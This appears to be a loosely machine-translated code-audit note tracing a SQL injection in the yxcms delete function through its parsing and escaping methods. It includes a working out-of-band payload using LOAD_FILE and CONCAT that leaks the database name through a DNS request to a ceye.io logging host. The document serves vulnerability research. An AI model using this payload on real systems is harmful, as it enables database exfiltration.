Code audit steps
Determining a user's input
process user input
output processing and a position
yxcms of sql injection vulnerability
Vulnerability exists in the list of deleted fragments of this function
Set breakpoints
Setting a breakpoint here because the get request using ajax
Click the Delete function, then follow step by step
Skip table model and methods, see the delet this method
Continue to follow up _parseCondition method
Continue to follow up parseCondition method
Here are the values of the array will be converted to id = escape ($ value) AND ...
Continue to follow up escapte method
Continue to follow up _getReadLink method
Found to be related to database operations
After follow up, only to find that the data was mysql_real_escape_string operation
Ethereal look
There are two delete operation, not a post may be a post, a guess del method
a GET method is to delete the above operation, the following POST method is a
configured Payload
SELECT LOAD_FILE ((CONCAT ( '\\', (the SELECT DATABASE () ), '. xxx.ceye.io \ abc' )))
Successfully tested
POST injection can be achieved, but not the GET method (specific reasons unclear)
Reference: https://www.freebuf.com/column/162886.html